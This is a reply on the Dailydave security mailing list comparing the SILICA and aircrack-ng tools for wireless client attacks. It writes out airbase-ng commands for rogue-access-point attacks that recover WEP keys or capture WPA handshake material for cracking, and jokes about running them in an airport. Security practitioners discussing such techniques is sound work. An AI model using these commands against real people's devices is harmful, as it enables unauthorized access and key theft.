On 2 December 2011 15:39, Dave Aitel <[email protected]> wrote:
> It's not a new attack - the key thing with SILICA is that people can
> actually USE it. Although it's possible that aircrackNG is easier to use
> than I'm giving it credit for - have you tried it lately with this attack?

I have never used SILICA. Send me a licence and I'll give it a go ;)

I have used the cfrag attack with aircrack before. I'm not on a system to test right now, but I believe the magic incarnation is below (you may need to also specify the client MAC). The magic bit being the -N flag (-L for Caffe Latte).

#wep40
airbase-ng -N -W 1 -c [channel] -z 1 -P mon0
#wep104
airbase-ng -N -W 1 -c [channel] -z 4 -P mon1

Worth mentioning that you can also run the following to get a valid MIC for a given SNonce, ANonce, client MAC and client AP, which should allow you to [attempt to] crack a WPA PSK.

#WPA (and this is off the top of my head so be kind if I miss an option)
airbase-ng -N -c [channel] -z 2 -P mon2
#WPA2
airbase-ng -N -c [channel] -z 4 -P mon3

Run all of the above in an airport and see what you get :)

Personally I have never found aircrack too difficult to use; run it with the wrong arguments and it generally tells you which ones it thinks you should be using. I also see the benefit of an integrated GUI that does all the thinking for you.

> Of course, not all of your boxes are vulnerable to this sort of thing.
> Phones, in a turn of fate, are usually immune.

Could you elaborate on this? I find phones can often be the worst offenders. These attacks generally rely on the fact that unconnected devices constantly probe for networks they "know about". The iPhone and I suspect other iOS devices don't allow you to remove networks unless you are in range of them. However I guess they do turn off wifi to preserve batteries; I guess this is what you mean?

_______________________________________________
Dailydave mailing list
[email protected]
https://lists.immunityinc.com/mailman/listinfo/dailydave
